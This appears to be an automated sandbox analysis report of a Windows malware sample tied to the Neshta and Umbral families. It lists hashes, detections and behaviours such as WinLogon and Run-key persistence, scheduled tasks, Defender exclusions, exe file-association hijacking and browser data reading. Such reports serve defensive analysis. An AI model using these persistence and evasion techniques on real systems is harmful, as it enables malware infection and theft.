Resubmissions
19/10/2024, 11:46
241019-nxh3lawepj 1019/10/2024, 11:42
241019-nvc4kathmg 719/10/2024, 11:38
241019-nrspvawcnp 1019/10/2024, 11:33
241019-nnzc8atfla 1019/10/2024, 11:27
241019-nkpplswakl 1019/10/2024, 11:23
241019-nhfnxsvhmk 1019/10/2024, 11:11
241019-najevashqf 1019/10/2024, 11:07
241019-m762qssgph 3Analysis
-
max time kernel
208s -
max time network
207s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19/10/2024, 11:33
Static task
static1
General
-
Target
6812964531.exe
-
Size
67KB
-
MD5
7de65122a13ab9d81368ee3dff3cc80a
-
SHA1
ecbb4db641431d4d672e4b88e8d309419fd32f04
-
SHA256
a73a05a4b6ec6ae1c1ba6d3d12b68cc52b899e2a6dbbaaa1f48f2c260a733123
-
SHA512
b156d77a665c3256ddfd016e46105b6e87db6a4c1ca77e9bb25b221c368f3cc53dddc7159602cfb926ef0cc9bacac57b6bd41e7e28998883c996727d58d29401
-
SSDEEP
1536:pr3rob4nqB6veqHnq+Pgm5NN9vbDTc+1vIQ/EXyBej:h7PEg3qcv5PvB/EVj
Malware Config
Signatures
-
Detect Neshta payload 32 IoCs
resource yara_rule behavioral1/files/0x0014000000023ce1-472.dat family_neshta behavioral1/files/0x000a000000023ceb-506.dat family_neshta behavioral1/files/0x0006000000020232-630.dat family_neshta behavioral1/files/0x000400000002030e-629.dat family_neshta behavioral1/files/0x0001000000021534-647.dat family_neshta behavioral1/files/0x00010000000214e1-651.dat family_neshta behavioral1/files/0x00010000000167fd-660.dat family_neshta behavioral1/files/0x0001000000022f7e-659.dat family_neshta behavioral1/files/0x0001000000022f80-658.dat family_neshta behavioral1/files/0x0001000000022f3f-657.dat family_neshta behavioral1/files/0x0001000000022f42-656.dat family_neshta behavioral1/files/0x0001000000022f7f-655.dat family_neshta behavioral1/files/0x0001000000022f41-653.dat family_neshta behavioral1/files/0x0001000000022f40-652.dat family_neshta behavioral1/files/0x00010000000214e0-650.dat family_neshta behavioral1/files/0x00010000000214df-649.dat family_neshta behavioral1/files/0x00010000000225de-648.dat family_neshta behavioral1/files/0x0002000000020312-646.dat family_neshta behavioral1/files/0x000800000002023c-645.dat family_neshta behavioral1/files/0x000600000002023a-644.dat family_neshta behavioral1/files/0x0001000000020294-628.dat family_neshta behavioral1/files/0x000400000002033a-622.dat family_neshta behavioral1/files/0x000400000002034d-627.dat family_neshta behavioral1/files/0x00010000000202ac-626.dat family_neshta behavioral1/files/0x000400000002033b-625.dat family_neshta behavioral1/files/0x0001000000020299-624.dat family_neshta behavioral1/files/0x000100000002022a-623.dat family_neshta behavioral1/files/0x0006000000020217-621.dat family_neshta behavioral1/files/0x0006000000020223-620.dat family_neshta behavioral1/files/0x000600000002021b-619.dat family_neshta behavioral1/files/0x0007000000020283-618.dat family_neshta behavioral1/files/0x0004000000020348-617.dat family_neshta -
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000023cff-743.dat family_umbral -
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Defender\\uk-UA\\winlogon.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Defender\\uk-UA\\winlogon.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Setup Files\\Bridgesurrogate.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Defender\\uk-UA\\winlogon.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Setup Files\\Bridgesurrogate.exe\", \"C:\\MsAgentBrowserdhcp\\taskhostw.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Defender\\uk-UA\\winlogon.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Setup Files\\Bridgesurrogate.exe\", \"C:\\MsAgentBrowserdhcp\\taskhostw.exe\", \"C:\\Program Files\\Windows Photo Viewer\\Bridgesurrogate.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Defender\\uk-UA\\winlogon.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Setup Files\\Bridgesurrogate.exe\", \"C:\\MsAgentBrowserdhcp\\taskhostw.exe\", \"C:\\Program Files\\Windows Photo Viewer\\Bridgesurrogate.exe\", \"C:\\Program Files\\Internet Explorer\\de-DE\\csrss.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Windows Defender\\uk-UA\\winlogon.exe\", \"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Setup Files\\Bridgesurrogate.exe\", \"C:\\MsAgentBrowserdhcp\\taskhostw.exe\", \"C:\\Program Files\\Windows Photo Viewer\\Bridgesurrogate.exe\", \"C:\\Program Files\\Internet Explorer\\de-DE\\csrss.exe\", \"C:\\MsAgentBrowserdhcp\\Bridgesurrogate.exe\"" Bridgesurrogate.exe -
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4272 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3580 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2156 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5024 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4440 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1652 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3968 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3952 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3532 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4876 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2604 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1312 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3052 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3992 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 956 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5092 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 220 3292 schtasks.exe 142 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4468 3292 schtasks.exe 142 -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3860 powershell.exe 3060 powershell.exe 224 powershell.exe 4648 powershell.exe 3604 powershell.exe 4984 powershell.exe -
Disables Task Manager via registry modification
-
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x0007000000023cf7-528.dat acprotect -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Bridgesurrogate.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Start.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation windef_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation MINECR~1.EXE Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Synaptics.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation 3mb_online_install.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation windef_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation ._cache_MINECR~1.EXE Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation ._cache_Synaptics.exe -
Executes dropped EXE 19 IoCs
pid Process 3456 3mb_online_install.exe 4884 Start.exe 2768 curl.exe 1784 windef_installer.exe 388 windef_installer.exe 1116 svchost.com 4352 WINLOC~1.EXE 1800 svchost.com 2772 MINECR~1.EXE 4464 svchost.com 4704 cheats.exe 4876 svchost.com 4080 cheat.exe 4680 ._cache_MINECR~1.EXE 528 Synaptics.exe 4060 ._cache_Synaptics.exe 4748 Bridgesurrogate.exe 4788 Bridgesurrogate.exe 4924 winlogon.exe -
Loads dropped DLL 5 IoCs
pid Process 4352 WINLOC~1.EXE 4352 WINLOC~1.EXE 4352 WINLOC~1.EXE 4352 WINLOC~1.EXE 4352 WINLOC~1.EXE -
Modifies system executable filetype association 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" windef_installer.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bridgesurrogate = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Setup Files\\Bridgesurrogate.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bridgesurrogate = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Setup Files\\Bridgesurrogate.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\MsAgentBrowserdhcp\\taskhostw.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bridgesurrogate = "\"C:\\Program Files\\Windows Photo Viewer\\Bridgesurrogate.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bridgesurrogate = "\"C:\\MsAgentBrowserdhcp\\Bridgesurrogate.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bridgesurrogate = "\"C:\\MsAgentBrowserdhcp\\Bridgesurrogate.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Internet Explorer\\de-DE\\csrss.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\????? = "C:\\ProgramData\\Synaptics\\Synaptics.exe" MINECR~1.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\Windows Defender\\uk-UA\\winlogon.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\Windows Defender\\uk-UA\\winlogon.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\MsAgentBrowserdhcp\\taskhostw.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bridgesurrogate = "\"C:\\Program Files\\Windows Photo Viewer\\Bridgesurrogate.exe\"" Bridgesurrogate.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Internet Explorer\\de-DE\\csrss.exe\"" Bridgesurrogate.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 98 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC470AB7F9C71A401BBF66E6B365D2F620.TMP csc.exe File created \??\c:\Windows\System32\lhkpi-.exe csc.exe -
resource yara_rule behavioral1/files/0x0008000000023cf3-509.dat upx behavioral1/files/0x0007000000023cf7-528.dat upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe windef_installer.exe File opened for modification C:\PROGRA~3\Drivers\Driver.exe windef_installer.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe svchost.com File opened for modification C:\PROGRA~2\WINDOW~2\wabmig.exe svchost.com File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe windef_installer.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe windef_installer.exe File opened for modification C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe windef_installer.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe svchost.com File created C:\Program Files\Windows Photo Viewer\dbfa0bd15ad253 Bridgesurrogate.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe windef_installer.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE windef_installer.exe File opened for modification C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE windef_installer.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe svchost.com File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe svchost.com File created C:\Program Files\Windows Defender\uk-UA\cc11b995f2a76d Bridgesurrogate.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe windef_installer.exe File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe svchost.com File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe windef_installer.exe File opened for modification C:\PROGRA~3\Drivers\Driver.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe svchost.com File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE windef_installer.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE windef_installer.exe File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe windef_installer.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe windef_installer.exe File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE windef_installer.exe File created C:\Program Files\Internet Explorer\de-DE\csrss.exe Bridgesurrogate.exe File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe windef_installer.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe windef_installer.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe windef_installer.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe windef_installer.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe svchost.com File opened for modification C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe windef_installer.exe File opened for modification C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE windef_installer.exe File created C:\Program Files\Internet Explorer\de-DE\886983d96e3d3e Bridgesurrogate.exe File created C:\Program Files\Windows Defender\uk-UA\winlogon.exe Bridgesurrogate.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE windef_installer.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe svchost.com -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\svchost.com windef_installer.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6812964531.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Start.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINLOC~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3mb_online_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windef_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MINECR~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ._cache_MINECR~1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windef_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Kills process with taskkill 1 IoCs
pid Process 3964 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings ._cache_MINECR~1.EXE Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings ._cache_Synaptics.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings java.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" windef_installer.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings windef_installer.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings javaw.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ MINECR~1.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Synaptics.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings Bridgesurrogate.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1312 schtasks.exe 3992 schtasks.exe 956 schtasks.exe 5092 schtasks.exe 5024 schtasks.exe 4440 schtasks.exe 3968 schtasks.exe 3532 schtasks.exe 1412 schtasks.exe 3580 schtasks.exe 2156 schtasks.exe 4468 schtasks.exe 4272 schtasks.exe 3952 schtasks.exe 220 schtasks.exe 1652 schtasks.exe 4876 schtasks.exe 2604 schtasks.exe 3052 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 376 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 Bridgesurrogate.exe 4748 